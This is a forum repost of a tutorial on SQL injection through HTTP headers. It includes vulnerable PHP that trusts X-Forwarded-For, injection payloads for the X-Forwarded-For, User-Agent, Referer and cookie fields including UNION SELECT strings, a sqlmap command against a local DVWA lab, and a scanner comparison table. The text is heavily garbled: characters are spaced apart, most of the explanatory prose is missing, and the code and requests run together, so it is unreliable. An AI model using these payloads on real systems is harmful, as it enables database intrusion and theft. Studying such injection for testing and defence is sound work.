[20782] 2017-06-13_通过HTTP头进行SQL注入

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2017-06-13_通过HTTP头进行SQL注入   H T T P     S Q L   L e m o n S e c   2 0 1 7 - 0 6 - 1 3 w e b S Q L G E T P O S T H T T P S Q L H T T P 使 w e b 6 0 w e b & u r l s S h a y   C h e n 2 0 1 1 w e b H T T P   G E T U R L H T T P   P O S T H T T P H T T P   C o o k i e H T T P   c o o k i e H T T P   H e a d e r s H T T P 使 7 5 % w e b H T T P   H e a d e r s 7 0 % H T T P   C o o k i e s G E T P O S T H T T P   h e a d e r s S Q L H T T P   H e a d e r s C o o k i e 使 H T T P S Q L H T T P H T T P H T T P H T T P :     H T T P G E T   /   H T T P / 1 . 1 C o n n e c t i o n :   K e e p - A l i v e
K e e p - A l i v e :   3 0 0 A c c e p t : * / * H o s t :   h o s t A c c e p t - L a n g u a g e :   e n - u s A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s ;   U ;   W i n d o w s   N T   5 . 1 ;   e n - U S ; r v : 1 . 9 . 2 . 1 6 )   G e c k o / 2 0 1 1 0 3 1 9   F i r e f o x / 3 . 6 . 1 6   (   . N E T   C L R   3 . 5 . 3 0 7 2 9 ;   . N E T 4 . 0 E ) C o o k i e :   g u e s t _ i d = v 1 % 3 A 1 3 2 8 0 1 9 0 6 4 ;   p i d = v 1 % 3 A 1 3 2 8 8 3 9 3 1 1 1 3 4 H T T P   C o o k i e s H T T P 使 C o o k i e S Q L H T T P X - F o r w a r d e d - F o r X - F o r w a r d e d - F o r H T T P H T T P w e b i p $ r e q   =   m y s q l _ q u e r y ( S E L E C T   u s e r , p a s s w o r d   F R O M   a d m i n s   W H E R E   u s e r = ' . s a n i t i z e ( $ _ P O S T [ u s e r ] ) .   A N D p a s s w o r d = ' . m d 5 ( $ _ P O S T [ p a s s w o r d ] ) .   A N D   i p _ a d r = ' . i p _ a d r ( ) . ) ; s a n i t i z e ( )   f u n c t i o n   s a n i t i z e ( $ p a r a m ) {   i f   ( i s _ n u m e r i c ( $ p a r a m ) )   {   r e t u r n   $ p a r a m ;   }   e l s e   {   r e t u r n   m y s q l _ r e a l _ e s c a p e _ s t r i n g ( $ p a r a m ) ;   }   } i p i p _ a d d r ( ) f u n c t i o n   i p _ a d r ( )   {   i f ( i s s e t ( $ _ S E R V E R [ H T T P _ X _ F O R W A R D E D _ F O R ] ) )   {   $ i p _ a d r   =   $ _ S E R V E R [ H T T P _ X _ F O R W A R D E D _ F O R ] ;   }   e l s e   {   $ i p _ a d r   = $ _ S E R V E R [ R E M O T E _ A D D R ] ;   }   i f   ( p r e g _ m a t c h ( # ^ [ 0 - 9 ] { 1 , 3 } . [ 0 - 9 ] { 1 , 3 } . [ 0 - 9 ] { 1 , 3 } . [ 0 - 9 ] { 1 , 3 } # , $ i p _ a d d r ) )   {   r e t u r n   $ i p _ a d r ;   } e l s e   {   r e t u r n   $ _ S E R V E R [ R E M O T E _ A D D R ] ;   }   } i p H T T P X _ F O R W A R D E D _ F O R   p r e g _ m a t c h i p 使 S Q L H T T P _ X _ F O R W A R D E D _ F O R   S Q L S Q L : G E T   / i n d e x . p h p   H T T P / 1 . 1 H o s t :   [ h o s t ] X _ F O R W A R D E D _ F O R   : 1 2 7 . 0 . 0 . 1   o r   1 = 1 # U s e r - a g e n t u s e r   a g e n t H T T P H T T P u s e r - a g e n t u s e r - a g e n t H T T P G E T   / i n d e x . p h p   H T T P / 1 . 1 H o s t :   [ h o s t ] U s e r - A g e n t :   a a a   o r   1 / * R e f e r e r R e f e r e r S Q L H T T P U R I 退 便 G E T   / i n d e x . p h p   H T T P / 1 . 1 H o s t :   [ h o s t ] U s e r - A g e n t :   a a a   o r   1 / * R e f e r e r :   h t t p : / / w w w . y a b o u k i r . c o m ? O W A S P w e b G E T P O S T C o o k i e H T T P
. C o o k i e H T T P   C o o k i e 使 使 C o o k i e   M a n a g e r +   c o o k i e s c o o k i e s c o o k i e s / c o o k i e s C o o k i e s   M a n a g e r + C o o k i e   l a n g u a g e _ i d S Q L l a n g u a g e _ i d H T T P   c o o k i e S Q L : S Q L C o o k i e s   M a n a g e r +   c o o k i e c o o k i e 使 F i r e f o x T a m p e r   D a t a : T a m p e r   D a t a   H T T P / H T T P S P O S T
T a m p e r   D a t a S t a r t   T a m p e r H T T P T a m p e r   D a t a H T T P T a m p e r T a m p e r : o r d e r   b y   4 H T T P   c o o k i e :   o r d e r   b y   5 .   : 4 H T T P   c o o k i e l a n g u a g e _ i d : - 1 + U N I O N + A L L + S E L E C T + 1 , 2 , 3 , 4 S Q L 使 使 S q l m a p S q l m a p   S Q L S q l m a p   H T T P   c o o k i e 使 : w e b c o o k i e s S Q L S q l m a p G E T P O S T - l e v e l 2 H T T P   C o o k i e   3 H T T P   U s e r _ A g e n t H T T P   R e f e r e r s q l m a p
- l e v e l T e s t e d   H T T P   p a r a m e t e r L e v e l   i n   s q l m a p G E T 1   ( D e f a u l t ) P O S T 1   ( D e f a u l t ) H T T P   C o o k i e 2   ? H T T P   U s e r - A g e n t 3   ? H T T P   R e f e r e r 3   ? G E T i d H T T P   U s e r - a g e n t - p   i d , u s e r - a g e n t D V W A   ( D a m n   V u l n e r a b l e   W e b   A p p l i c a t i o n ) H T T P   c o o k i e s e c u r i t y . / s q l m a p . p y   - u   h t t p : / / 1 2 7 . 0 . 0 . 1 / v u l n e r a b i l i t i e s / s q l i / ? i d = 1 & S u b m i t = S u b m i t # c o o k i e = P H P S E S S I D = 0 e 4 j f b r g d 8 1 9 0 i g 3 u b a 7 r v s i p 1 ;   s e c u r i t y = l o w s t r i n g = F i r s t   n a m e   d b s   l e v e l   3   - p   P H P S E S S I D - s t r i n g - d b s - p P H P S E S S I D S Q L ? 使 s e c t o o l m a r k e t . c o m G E T P O S T H T T P   C o o k i e H T T P   H e a d e r s 1 0 0 % 4 / 4 使 1 4 R a n k V u l n e r a b i l i t y   S c a n n e r V e n d o r D e t e c t i o n   R a t e I n p u t   V e c t o r   C o v e r a g e A v e r a g e   S c o r e 1 A r a c h n i T a s o s   L a s k o s 1 0 0 . 0 0 % 1 0 0 % 1 0 0 . 0 0 % 2 S q l m a p s q l m a p   d e v e l o p e r s 9 7 . 0 6 % 1 0 0 % 9 8 , 5 3 % 3 I B M   A p p S c a n I B M   S e c u r i t y   S y s   D i v i s i o n 9 3 . 3 8 % 1 0 0 % 9 6 , 6 9 % 4 A c u n e t i x   W V S A c u n e t i x 8 9 . 7 1 % 1 0 0 % 9 4 , 8 5 % 5 N T O S p i d e r N T   O B J E C T i v e s 8 5 . 2 9 % 1 0 0 % 9 2 , 6 4 % 6 N e s s u s T e n a b l e   N e t w o r k   S e c u r i t y 8 2 . 3 5 % 1 0 0 % 9 1 , 1 7 % 7 W e b I n s p e c t H P   A p p s   S e c u r i t y   C e n t e r 7 5 . 7 4 % 1 0 0 % 8 7 , 8 7 % 8 B u r p   S u i t e   P r o P o r t S w i g g e r 7 2 . 0 6 % 1 0 0 % 8 6 , 0 3 % 9 C e n z i c   P r o C e n z i c 6 3 . 2 4 % 1 0 0 % 8 1 , 6 2 % 1 0 S k i p F i s h M i c h a l   Z a l e w s k i     G o o g l e 5 0 . 7 4 % 1 0 0 % 7 5 , 3 7 % 1 1 W a p i t i O W A S P 1 0 0 . 0 0 % 5 0 % 7 5 . 0 0 %
1 2 N e t s p a r k e r M a v i t u n a   S e c u r i t y 9 8 . 0 0 % 5 0 % 7 4 . 0 0 % 1 3 P a r o s   P r o M i l e S C A N   T e c h n o l o g i e s 9 3 . 3 8 % 5 0 % 7 1 , 6 9 % 1 4 Z A P O W A S P 7 7 , 2 1 % 5 0 % 6 3 , 6 0 %
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则